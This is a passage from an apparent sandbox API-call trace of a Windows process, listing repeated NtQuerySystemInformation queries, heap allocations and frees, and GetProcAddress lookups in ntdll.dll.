ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x50, ResultLength=0x0) [0229.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x50, ResultLength=0x0) [0229.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x50, ResultLength=0x0) [0229.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecf0, Length=0x38, ResultLength=0x0) [0229.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb20, Length=0x28, ResultLength=0x0) [0229.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb20, Length=0x28, ResultLength=0x0) [0229.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb20, Length=0x28, ResultLength=0x0) [0229.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb20, Length=0x28, ResultLength=0x0) [0229.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb90, Length=0x28, ResultLength=0x0) [0229.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecf0, Length=0x38, ResultLength=0x0) [0229.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec10, Length=0x28, ResultLength=0x0) [0229.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec10, Length=0x28, ResultLength=0x0) [0229.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feab0, Length=0x20, ResultLength=0x0) [0229.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea30, Length=0x20, ResultLength=0x0) [0229.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea30, Length=0x20, ResultLength=0x0) [0229.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea30, Length=0x20, ResultLength=0x0) [0229.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecf0, Length=0x38, ResultLength=0x0) [0229.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecf0, Length=0x38, ResultLength=0x0) [0229.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb70, Length=0x20, ResultLength=0x0) [0229.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb00, Length=0x20, ResultLength=0x0) [0229.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb00, Length=0x20, ResultLength=0x0) [0229.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.943] GetProcessHeap () returned 0x27fc8db0000 [0229.943] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efac70 [0229.943] GetProcessHeap () returned 0x27fc8db0000 [0229.943] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f8a0 [0229.944] GetProcessHeap () returned 0x27fc8db0000 [0229.944] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x11c) returned 0x27fc8dc02e0 [0229.945] GetProcessHeap () returned 0x27fc8db0000 [0229.945] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x128) returned 0x27fc8dc0540 [0229.946] GetProcessHeap () returned 0x27fc8db0000 [0229.946] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8e960 [0229.946] GetProcessHeap () returned 0x27fc8db0000 [0229.946] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x130) returned 0x27fc8e29e90 [0229.946] GetProcessHeap () returned 0x27fc8db0000 [0229.946] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efbcf0 [0229.946] GetProcessHeap () returned 0x27fc8db0000 [0229.946] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f520 [0229.946] GetProcessHeap () returned 0x27fc8db0000 [0229.946] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e45a30 | out: hHeap=0x27fc8db0000) returned 1 [0229.946] GetProcessHeap () returned 0x27fc8db0000 [0229.946] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x1e4) returned 0x27fc8e5dc90 [0229.947] GetProcessHeap () returned 0x27fc8db0000 [0229.947] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x104) returned 0x27fc8e0d740 [0229.947] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xf7a67ff208 | out: phModule=0xf7a67ff208*=0x7ffcea380000) returned 1 [0229.947] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0229.948] GetProcessHeap () returned 0x27fc8db0000 [0229.949] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8e420 [0229.949] GetProcessHeap () returned 0x27fc8db0000 [0229.949] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x50) returned 0x27fc9d0f780 [0229.949] GetProcessHeap () returned 0x27fc8db0000 [0229.949] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efb770 [0229.949] GetProcessHeap () returned 0x27fc8db0000 [0229.949] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f5f0 [0229.949] GetProcessHeap () returned 0x27fc8db0000 [0229.949] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x40) returned 0x27fc9e88290 [0229.949] GetProcessHeap () returned 0x27fc8db0000 [0229.949] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dc0540 | out: hHeap=0x27fc8db0000) returned 1 [0229.949] GetProcessHeap () returned 0x27fc8db0000 [0229.949] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e29e90 | out: hHeap=0x27fc8db0000) returned 1 [0229.950] GetProcessHeap () returned 0x27fc8db0000 [0229.950] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efbcf0 | out: hHeap=0x27fc8db0000) returned 1 [0229.950] GetProcessHeap () returned 0x27fc8db0000 [0229.950] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f520 | out: hHeap=0x27fc8db0000) returned 1 [0229.950] GetProcessHeap () returned 0x27fc8db0000 [0229.950] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8e960 | out: hHeap=0x27fc8db0000) returned 1 [0229.950] GetProcessHeap () returned 0x27fc8db0000 [0229.950] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e5dc90 | out: hHeap=0x27fc8db0000) returned 1 [0229.950] GetProcessHeap () returned 0x27fc8db0000 [0229.950] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e0d740 | out: hHeap=0x27fc8db0000) returned 1 [0229.950] GetProcessHeap () returned 0x27fc8db0000 [0229.950] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9d0f780 | out: hHeap=0x27fc8db0000) returned 1 [0229.950] GetProcessHeap () returned 0x27fc8db0000 [0229.950] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efb770 | out: hHeap=0x27fc8db0000) returned 1 [0229.950] GetProcessHeap () returned 0x27fc8db0000 [0229.950] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f5f0 | out: hHeap=0x27fc8db0000) returned 1 [0229.950] GetProcessHeap () returned 0x27fc8db0000 [0229.950] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8e420 | out: hHeap=0x27fc8db0000) returned 1 [0229.950] GetProcessHeap () returned 0x27fc8db0000 [0229.950] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e87f70 | out: hHeap=0x27fc8db0000) returned 1 [0229.951] GetProcessHeap () returned 0x27fc8db0000 [0229.951] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dc02e0 | out: hHeap=0x27fc8db0000) returned 1 [0229.951] GetProcessHeap () returned 0x27fc8db0000 [0229.951] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e88290 | out: hHeap=0x27fc8db0000) returned 1 [0229.951] GetProcessHeap () returned 0x27fc8db0000 [0229.951] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efac70 | out: hHeap=0x27fc8db0000) returned 1 [0229.951] GetProcessHeap () returned 0x27fc8db0000 [0229.951] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f8a0 | out: hHeap=0x27fc8db0000) returned 1 [0229.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.952] GetProcessHeap () returned 0x27fc8db0000 [0229.952] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efb350 [0229.952] GetProcessHeap () returned 0x27fc8db0000 [0229.952] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f880 [0229.952] GetProcessHeap () returned 0x27fc8db0000 [0229.952] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x122) returned 0x27fc8dbfcf0 [0229.954] GetProcessHeap () returned 0x27fc8db0000 [0229.954] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x130) returned 0x27fc8e45a30 [0229.954] GetProcessHeap () returned 0x27fc8db0000 [0229.954] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8e960 [0229.954] GetProcessHeap () returned 0x27fc8db0000 [0229.954] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x138) returned 0x27fc8e5dc90 [0229.954] GetProcessHeap () returned 0x27fc8db0000 [0229.954] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efad20 [0229.955] GetProcessHeap () returned 0x27fc8db0000 [0229.955] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f700 [0229.955] GetProcessHeap () returned 0x27fc8db0000 [0229.955] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e29e90 | out: hHeap=0x27fc8db0000) returned 1 [0229.955] GetProcessHeap () returned 0x27fc8db0000 [0229.955] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x1ec) returned 0x27fc8e29e90 [0229.956] GetProcessHeap () returned 0x27fc8db0000 [0229.956] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x2f4) returned 0x27fc9cf50d0 [0229.956] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xf7a67ff208 | out: phModule=0xf7a67ff208*=0x7ffcea380000) returned 1 [0229.956] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0229.959] GetProcessHeap () returned 0x27fc8db0000 [0229.959] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8e420 [0229.959] GetProcessHeap () returned 0x27fc8db0000 [0229.959] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x80) returned 0x27fc9ee3450 [0229.959] GetProcessHeap () returned 0x27fc8db0000 [0229.959] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efb770 [0229.959] GetProcessHeap () returned 0x27fc8db0000 [0229.959] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f7a0 [0229.960] GetProcessHeap () returned 0x27fc8db0000 [0229.960] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x6c) returned 0x27fc9ecf5b0 [0229.960] GetProcessHeap () returned 0x27fc8db0000 [0229.960] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e45a30 | out: hHeap=0x27fc8db0000) returned 1 [0229.960] GetProcessHeap () returned 0x27fc8db0000 [0229.960] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e5dc90 | out: hHeap=0x27fc8db0000) returned 1 [0229.960] GetProcessHeap () returned 0x27fc8db0000 [0229.960] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efad20 | out: hHeap=0x27fc8db0000) returned 1 [0229.960] GetProcessHeap () returned 0x27fc8db0000 [0229.961] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f700 | out: hHeap=0x27fc8db0000) returned 1 [0229.961] GetProcessHeap () returned 0x27fc8db0000 [0229.961] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8e960 | out: hHeap=0x27fc8db0000) returned 1 [0229.961] GetProcessHeap () returned 0x27fc8db0000 [0229.961] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e29e90 | out: hHeap=0x27fc8db0000) returned 1 [0229.961] GetProcessHeap () returned 0x27fc8db0000 [0229.961] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9cf50d0 | out: hHeap=0x27fc8db0000) returned 1 [0229.961] GetProcessHeap () returned 0x27fc8db0000 [0229.961] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9ee3450 | out: hHeap=0x27fc8db0000) returned 1 [0229.961] GetProcessHeap () returned 0x27fc8db0000 [0229.961] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efb770 | out: hHeap=0x27fc8db0000) returned 1 [0229.961] GetProcessHeap () returned 0x27fc8db0000 [0229.961] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f7a0 | out: hHeap=0x27fc8db0000) returned 1 [0229.961] GetProcessHeap () returned 0x27fc8db0000 [0229.961] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8e420 | out: hHeap=0x27fc8db0000) returned 1 [0229.961] GetProcessHeap () returned 0x27fc8db0000 [0229.961] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9ecfbb0 | out: hHeap=0x27fc8db0000) returned 1 [0229.962] GetProcessHeap () returned 0x27fc8db0000 [0229.962] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dbfcf0 | out: hHeap=0x27fc8db0000) returned 1 [0229.962] GetProcessHeap () returned 0x27fc8db0000 [0229.962] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9ecf5b0 | out: hHeap=0x27fc8db0000) returned 1 [0229.962] GetProcessHeap () returned 0x27fc8db0000 [0229.962] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efb350 | out: hHeap=0x27fc8db0000) returned 1 [0229.962] GetProcessHeap () returned 0x27fc8db0000 [0229.962] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f880 | out: hHeap=0x27fc8db0000) returned 1 [0229.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.137] GetProcessHeap () returned 0x27fc8db0000 [0230.137] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efa590 [0230.137] GetProcessHeap () returned 0x27fc8db0000 [0230.137] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f720 [0230.138] GetProcessHeap () returned 0x27fc8db0000 [0230.138] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xfe) returned 0x27fc8e0c0f0 [0230.139] GetProcessHeap () returned 0x27fc8db0000 [0230.139] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x108) returned 0x27fc8e0c640 [0230.139] GetProcessHeap () returned 0x27fc8db0000 [0230.139] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8e420 [0230.140] GetProcessHeap () returned 0x27fc8db0000 [0230.140] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x110) returned 0x27fc8e45a30 [0230.140] GetProcessHeap () returned 0x27fc8db0000 [0230.140] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efa640 [0230.140] GetProcessHeap () returned 0x27fc8db0000 [0230.140] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f650 [0230.140] GetProcessHeap () returned 0x27fc8db0000 [0230.140] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc992d900 | out: hHeap=0x27fc8db0000) returned 1 [0230.140] GetProcessHeap () returned 0x27fc8db0000 [0230.140] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x1c4) returned 0x27fc8e29e90 [0230.141] GetProcessHeap () returned 0x27fc8db0000 [0230.141] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xfc) returned 0x27fc8e0d740 [0230.141] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xf7a67ff288 | out: phModule=0xf7a67ff288*=0x7ffcea380000) returned 1 [0230.141] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0230.142] GetProcessHeap () returned 0x27fc8db0000 [0230.142] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8e960 [0230.142] GetProcessHeap () returned 0x27fc8db0000 [0230.142] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x48) returned 0x27fc9e87f70 [0230.142] GetProcessHeap () returned 0x27fc8db0000 [0230.142] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efb090 [0230.142] GetProcessHeap () returned 0x27fc8db0000 [0230.142] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f8a0 [0230.142] GetProcessHeap () returned 0x27fc8db0000 [0230.142] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x34) returned 0x27fc9f8eb60 [0230.142] GetProcessHeap () returned 0x27fc8db0000 [0230.142] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e0c640 | out: hHeap=0x27fc8db0000) returned 1 [0230.142] GetProcessHeap () returned 0x27fc8db0000 [0230.142] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e45a30 | out: hHeap=0x27fc8db0000) returned 1 [0230.142] GetProcessHeap () returned 0x27fc8db0000 [0230.143] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efa640 | out: hHeap=0x27fc8db0000) returned 1 [0230.143] GetProcessHeap () returned 0x27fc8db0000 [0230.143] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f650 | out: hHeap=0x27fc8db0000) returned 1 [0230.143] GetProcessHeap () returned 0x27fc8db0000 [0230.143] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8e420 | out: hHeap=0x27fc8db0000) returned 1 [0230.143] GetProcessHeap () returned 0x27fc8db0000 [0230.143] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e29e90 | out: hHeap=0x27fc8db0000) returned 1 [0230.143] GetProcessHeap () returned 0x27fc8db0000 [0230.143] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e0d740 | out: hHeap=0x27fc8db0000) returned 1 [0230.143] GetProcessHeap () returned 0x27fc8db0000 [0230.143] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e87f70 | out: hHeap=0x27fc8db0000) returned 1 [0230.143] GetProcessHeap () returned 0x27fc8db0000 [0230.143] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efb090 | out: hHeap=0x27fc8db0000) returned 1 [0230.143] GetProcessHeap () returned 0x27fc8db0000 [0230.143] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f8a0 | out: hHeap=0x27fc8db0000) returned 1 [0230.143] GetProcessHeap () returned 0x27fc8db0000 [0230.143] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8e960 | out: hHeap=0x27fc8db0000) returned 1 [0230.143] GetProcessHeap () returned 0x27fc8db0000 [0230.143] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e87700 | out: hHeap=0x27fc8db0000) returned 1 [0230.144] GetProcessHeap () returned 0x27fc8db0000 [0230.144] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e0c0f0 | out: hHeap=0x27fc8db0000) returned 1 [0230.144] GetProcessHeap () returned 0x27fc8db0000 [0230.144] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8eb60 | out: hHeap=0x27fc8db0000) returned 1 [0230.144] GetProcessHeap () returned 0x27fc8db0000 [0230.144] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efa590 | out: hHeap=0x27fc8db0000) returned 1 [0230.144] GetProcessHeap () returned 0x27fc8db0000 [0230.144] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f720 | out: hHeap=0x27fc8db0000) returned 1 [0230.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.146] GetProcessHeap () returned 0x27fc8db0000 [0230.146] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efb8d0 [0230.146] GetProcessHeap () returned 0x27fc8db0000 [0230.146] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f840 [0230.146] GetProcessHeap () returned 0x27fc8db0000 [0230.146] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xb8) returned 0x27fc9df9100 [0230.147] GetProcessHeap () returned 0x27fc8db0000 [0230.147] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xc0) returned 0x27fc9a18500 [0230.147] GetProcessHeap () returned 0x27fc8db0000 [0230.147] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8e420 [0230.147] GetProcessHeap () returned 0x27fc8db0000 [0230.147] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xc8) returned 0x27fc9a193a0 [0230.147] GetProcessHeap () returned 0x27fc8db0000 [0230.147] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efb980 [0230.147] GetProcessHeap () returned 0x27fc8db0000 [0230.147] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f750 [0230.147] GetProcessHeap () returned 0x27fc8db0000 [0230.147] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9a17c10 | out: hHeap=0x27fc8db0000) returned 1 [0230.147] GetProcessHeap () returned 0x27fc8db0000 [0230.147] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x17c) returned 0x27fc8e29e90 [0230.148] GetProcessHeap () returned 0x27fc8db0000 [0230.148] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xdc) returned 0x27fc8dbd520 [0230.148] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xf7a67ff3b0 | out: phModule=0xf7a67ff3b0*=0x7ffcea380000) returned 1 [0230.148] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0230.149] GetProcessHeap () returned 